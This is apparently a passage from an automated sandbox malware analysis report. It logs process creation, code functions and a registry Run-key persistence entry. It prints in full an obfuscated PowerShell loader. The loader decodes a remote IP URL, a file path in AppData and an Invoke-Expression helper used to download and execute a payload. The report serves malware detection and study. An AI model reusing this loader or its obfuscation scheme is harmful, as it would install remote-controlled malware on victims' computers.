ncou.tet Garvn ';$tamari=Andelskapitals ' Wic,ihSkridttFlisebtFlinkepRelaks:Spis k/Cablem/ esews8C.efsa7Drame,. Ubehv1Startl2 Dishi1 March. nrum1 Unbed0Aarlig5G psba.Pr.duk1Opteg 8 Oplys4Periv,/NeoclaUD,tabedOmnifavKas,ageCo.logjRetshanWhatsiiAlvildnO,gaveg CleweecowgirrSkriv,nPensioe Miracs Me.pa.SpinulaBovrupaforsknfDi.ndr ';$Unhesitatively=Andelskapitals ' Julea>Rhizop ';$Typechecke=Andelskapitals 'OrfedeiShyesseBesrgex Fr.tt ';$Boblegummiets142='Flyverdragterne';Ordonnant (Andelskapitals 'Plast.SCancane Sociat Udraa-wa,tebCAtavisoRek.rsnDiskoft Ild,leTransvnGu.deltRelosi Dok,me-Sla,gePOuttroaB.kebitNowtschSam.en indtjTKalibr:Torlek\Titre,HProlepaSmokehnVand.ok Idio nMexicasBek ftv DibensRokkesnTjreple Abstrt ocamasCharla3Myelof4Aargan.Photo t PickaxUlydigt,ormon Swith-GutturVCalo,iaVoltenl Khaf uGa biee A,tim ortjn$McnaugBC.llefo nthrbSksforltoldfoeKommutgObligauThuggemSpaltemsonnibiLappedetinta.t AttessAm.est1Noncoo4 ecidi2Cariam;Capafa ');Ordonnant (Andelskapitals ',ostvsiOmfo.mftiaars Change(Tm erftLakkedeHasenss TuvaltA,vask- Ascenp Tes,uaApriortAcronyhGylden ritonT Minim:Bund l\K.pitaHalvarsa Te.ron G,netkSticklnHol,afs gurnav nvades .redin specieDammust rottesKlassi3Sgneda4 Serie.Fi.klvtRhinanxbreasttMultim)Sp,uci{Ministe Br.dexGrundviNdringt Sprog}Doreth;R.cipr ');$Nonenvious = Andelskapitals 'Mistnke spec,cT,avelhHypo,toNo enc Komple%Ov rheasmdenapCorpsmpskurend Midjeaeuectit EfteraBroade%Ejidos\Ko.roidLitmusePathankTolvaalSh rtealaithrr Umisfa SpisetT ansmi WormroEntwinnconsec. ashiSurinseuJea.sepOccide Vesteu&Nuppe.&extra HankneSkurvoc.ulmothSatayfoStat,s iste$kolle. ';Ordonnant (Andelskapitals 'Matri,$Plovfug,arbgel KleptoRoligebMortada,etteflBienni:Cyanocb ErminamingelaK,rkebsM.skinkRede,iaPigmenpSnilde=vandre( trewcTredv
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Nedskrivningstidspunkter = 1;$Hotplate='S';$Hotplate+='ubstrin';$Hotplate+='g';Function Andelskapitals($Hentningens){$Stadsgartnerne167=$Hentningens.Length-$Nedskrivningstidspunkter;For($Perifere=6; $Perifere -lt $Stadsgartnerne167; $Perifere+=(7)){$Lungfishes+=$Hentningens.$Hotplate.Invoke( $Perifere, $Nedskrivningstidspunkter);}$Lungfishes;}function Ordonnant($splatcher){& ($Typechecke) ($splatcher);}$Nonlover=Andelskapitals ' Sys.aMG oundo hypopzHast.eiMetacrlP,nktulE,sekuaUdfore/Salva.5F.lked.Sto.mh0Bjerge Slips (C llutWBa aviiout,abnSpearmdBasisaoGustneweuryprs ,nsyn ,elaarNCor ndTDec,nc Ign,r1meadwo0Insali.Rygskk0.ceptr;,eutro CamporWReveiliBetalin Co,pl6 Shyes4Bra in;Tegn,f Fjern,xAmmoni6Ch.ysa4 Ps ud;Chemeh Trichor BefrdvTrilli:degend1Archse2r mmea1Shrimp.Macada0 Smrke)No loc RidderGTreskieUhjt,dc PaasykSkurveoUnp in/Introd2Sulted0H.hcer1 fiks.0Missan0 Ulpko1Elect,0 Uds,i1Her.is Lager.FAntipriSams.er Dunfie VarimfsndrerouninvexBroder/Fleece1Ste ku2Fonot,1Frigin.Oblige0Au ifo ';$Staser112=Andelskapitals 'L.gestUPostkasAlkohoe.nlaidr rero-Ka.ensAGaldesgE.dosaeUnsof ncou.tet Garvn ';$tamari=Andelskapitals ' Wic,ihSkridttFlisebtFlinkepRelaks:Spis k/Cablem/ esews8C.efsa7Drame,. Ubehv1Startl2 Dishi1 March. nrum1 Unbed0Aarlig5G psba.Pr.duk1Opteg 8 Oplys4Periv,/NeoclaUD,tabedOmnifavKas,ageCo.logjRetshanWhatsiiAlvildnO,gaveg CleweecowgirrSkriv,nPensioe Miracs Me.pa.SpinulaBovrupaforsknfDi.ndr ';$Unhesitatively=Andelskapitals ' Julea>Rhizop ';$Typechecke=Andelskapitals 'OrfedeiShyesseBesrgex Fr.tt ';$Boblegummiets142='Flyverdragterne';Ordonnant (Andelskapitals 'Plast.SCancane Sociat Udraa-wa,tebCAtavisoRek.rsnDiskoft Ild,leTransvnGu.deltRelosi Dok,me-Sla,gePOuttroaB.kebitNowtschSam.en indtjTKalibr:Torlek\Titre,HProlepaSmokehnVand.ok Idio nMexicasBek ftv DibensRokkesnTjreple Abstrt ocamasCharla3Myelof4Aargan.Photo t PickaxUlydigt,ormon Swith-GutturVCalo,iaVoltenl Khaf uGa biee A,tim ortjn$McnaugBC.llefo nthrbSksforltoldfoeKommutgObligauThuggemSpaltemsonnibiLappedetinta.t AttessAm.est1Noncoo4 ecidi2Cariam;Capafa ');Ordonnant (Andelskapitals ',ostvsiOmfo.mftiaars Change(Tm erftLakkedeHasenss TuvaltA,vask- Ascenp Tes,uaApriortAcronyhGylden ritonT Minim:Bund l\K.pitaHalvarsa Te.ron G,netkSticklnHol,afs gurnav nvades .redin specieDammust rottesKlassi3Sgneda4 Serie.Fi.klvtRhinanxbreasttMultim)Sp,uci{Ministe Br.dexGrundviNdringt Sprog}Doreth;R.cipr ');$Nonenvious = Andelskapitals 'Mistnke spec,cT,avelhHypo,toNo enc Komple%Ov rheasmdenapCorpsmpskurend Midjeaeuectit EfteraBroade%Ejidos\Ko.roidLitmusePathankTolvaalSh rtealaithrr Umisfa SpisetT ansmi WormroEntwinnconsec. ashiSurinseuJea.sepOccide Vesteu&Nuppe.&extra HankneSkurvoc.ulmothSatayfoStat,s iste$kolle. ';Ordonnant (Andelskapitals 'Matri,$Plovfug,arbgel KleptoRoligebMortada,etteflBienni:Cyanocb ErminamingelaK,rkebsM.skinkRede,iaPigmenpSnilde=vandre( trewcTredvJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Nedskrivningstidspunkter = 1;$Hotplate='S';$Hotplate+='ubstrin';$Hotplate+='g';Function Andelskapitals($Hentningens){$Stadsgartnerne167=$Hentningens.Length-$Nedskrivningstidspunkter;For($Perifere=6; $Perifere -lt $Stadsgartnerne167; $Perifere+=(7)){$Lungfishes+=$Hentningens.$Hotplate.Invoke( $Perifere, $Nedskrivningstidspunkter);}$Lungfishes;}function Ordonnant($splatcher){& ($Typechecke) ($splatcher);}$Nonlover=Andelskapitals ' Sys.aMG oundo hypopzHast.eiMetacrlP,nktulE,sekuaUdfore/Salva.5F.lked.Sto.mh0Bjerge Slips (C llutWBa aviiout,abnSpearmdBasisaoGustneweuryprs ,nsyn ,elaarNCor ndTDec,nc Ign,r1meadwo0Insali.Rygskk0.ceptr;,eutro CamporWReveiliBetalin Co,pl6 Shyes4Bra in;Tegn,f Fjern,xAmmoni6Ch.ysa4 Ps ud;Chemeh Trichor BefrdvTrilli:degend1Archse2r mmea1Shrimp.Macada0 Smrke)No loc RidderGTreskieUhjt,dc PaasykSkurveoUnp in/Introd2Sulted0H.hcer1 fiks.0Missan0 Ulpko1Elect,0 Uds,i1Her.is Lager.FAntipriSams.er Dunfie VarimfsndrerouninvexBroder/Fleece1Ste ku2Fonot,1Frigin.Oblige0Au ifo ';$Staser112=Andelskapitals 'L.gestUPostkasAlkohoe.nlaidr rero-Ka.ensAGaldesgE.dosaeUnsof ncou.tet Garvn ';$tamari=Andelskapitals ' Wic,ihSkridttFlisebtFlinkepRelaks:Spis k/Cablem/ esews8C.efsa7Drame,. Ubehv1Startl2 Dishi1 March. nrum1 Unbed0Aarlig5G psba.Pr.duk1Opteg 8 Oplys4Periv,/NeoclaUD,tabedOmnifavKas,ageCo.logjRetshanWhatsiiAlvildnO,gaveg CleweecowgirrSkriv,nPensioe Miracs Me.pa.SpinulaBovrupaforsknfDi.ndr ';$Unhesitatively=Andelskapitals ' Julea>Rhizop ';$Typechecke=Andelskapitals 'OrfedeiShyesseBesrgex Fr.tt ';$Boblegummiets142='Flyverdragterne';Ordonnant (Andelskapitals 'Plast.SCancane Sociat Udraa-wa,tebCAtavisoRek.rsnDiskoft Ild,leTransvnGu.deltRelosi Dok,me-Sla,gePOuttroaB.kebitNowtschSam.en indtjTKalibr:Torlek\Titre,HProlepaSmokehnVand.ok Idio nMexicasBek ftv DibensRokkesnTjreple Abstrt ocamasCharla3Myelof4Aargan.Photo t PickaxUlydigt,ormon Swith-GutturVCalo,iaVoltenl Khaf uGa biee A,tim ortjn$McnaugBC.llefo nthrbSksforltoldfoeKommutgObligauThuggemSpaltemsonnibiLappedetinta.t AttessAm.est1Noncoo4 ecidi2Cariam;Capafa ');Ordonnant (Andelskapitals ',ostvsiOmfo.mftiaars Change(Tm erftLakkedeHasenss TuvaltA,vask- Ascenp Tes,uaApriortAcronyhGylden ritonT Minim:Bund l\K.pitaHalvarsa Te.ron G,netkSticklnHol,afs gurnav nvades .redin specieDammust rottesKlassi3Sgneda4 Serie.Fi.klvtRhinanxbreasttMultim)Sp,uci{Ministe Br.dexGrundviNdringt Sprog}Doreth;R.cipr ');$Nonenvious = Andelskapitals 'Mistnke spec,cT,avelhHypo,toNo enc Komple%Ov rheasmdenapCorpsmpskurend Midjeaeuectit EfteraBroade%Ejidos\Ko.roidLitmusePathankTolvaalSh rtealaithrr Umisfa SpisetT ansmi WormroEntwinnconsec. ashiSurinseuJea.sepOccide Vesteu&Nuppe.&extra HankneSkurvoc.ulmothSatayfoStat,s iste$kolle. ';Ordonnant (Andelskapitals 'Matri,$Plovfug,arbgel KleptoRoligebMortada,etteflBienni:Cyanocb ErminamingelaK,rkebsM.skinkRede,iaPigmenpSnilde=vandre( trewcTredvJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 13_2_004044A4 LoadLibraryW,GetProcAddress,FreeLibrary,MessageBoxW,13_2_004044A4
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_00007FFD9BAA6F87 push esp; retf 1_2_00007FFD9BAA6F88
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_00007FFD9BAA4FAC pushfd ; retf 1_2_00007FFD9BAA4FCA
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_00007FFD9BAA3EAF push ds; retf 1_2_00007FFD9BAA3EB2
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_00007FFD9BAA65F3 push eax; iretd 1_2_00007FFD9BAA65F9
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_00007FFD9BAA457C push eax; retf 1_2_00007FFD9BAA45A2
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_00007FFD9BAA3DA4 push cs; retf 1_2_00007FFD9BAA3DB2
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_00007FFD9BAA45A4 push eax; retf 1_2_00007FFD9BAA45A2
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_00007FFD9BAA45A4 push ecx; retf 1_2_00007FFD9BAA45C2
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_00007FFD9BAA78FB push ebx; retf 1_2_00007FFD9BAA796A
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_00007FFD9BAA7958 push ebx; retf 1_2_00007FFD9BAA796A
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_00007FFD9BAA813C push ebx; ret 1_2_00007FFD9BAA816A
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_00007FFD9BAA54AD push es; iretd 1_2_00007FFD9BAA54B2
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_00007FFD9BB717EB push ebp; retf 1_2_00007FFD9BB717EC
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_00007FFD9BB71800 push ebp; retf 1_2_00007FFD9BB71801
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_00007FFD9BB75588 push eax; ret 1_2_00007FFD9BB75589
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_07360AB8 push eax; mov dword ptr [esp], ecx5_2_07360AC4
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_073608D8 push eax; mov dword ptr [esp], ecx5_2_07360AC4
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 13_2_0044693D push ecx; ret 13_2_0044694D
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 13_2_0044DB70 push eax; ret 13_2_0044DB84
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 13_2_0044DB70 push eax; ret 13_2_0044DBAC
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 13_2_00451D54 push eax; ret 13_2_00451D61
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 14_2_0044B090 push eax; ret 14_2_0044B0A4
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 14_2_0044B090 push eax; ret 14_2_0044B0CC
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 14_2_00444E71 push ecx; ret 14_2_00444E81
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_00414060 push eax; ret 15_2_00414074
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_00414060 push eax; ret 15_2_0041409C
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_00414039 push ecx; ret 15_2_00414049
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_004164EB push 0000006Ah; retf 15_2_004165C4
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_00416553 push 0000006Ah; retf 15_2_004165C4
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_00416555 push 0000006Ah; retf 15_2_004165C4
              Source: C:\Windows\SysWOW64\reg.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run NuchaleJump to behavior
              Source: C:\Windows\SysWOW64\reg.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run NuchaleJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 14_2_004047CB LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,14_2_004047CB
              Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
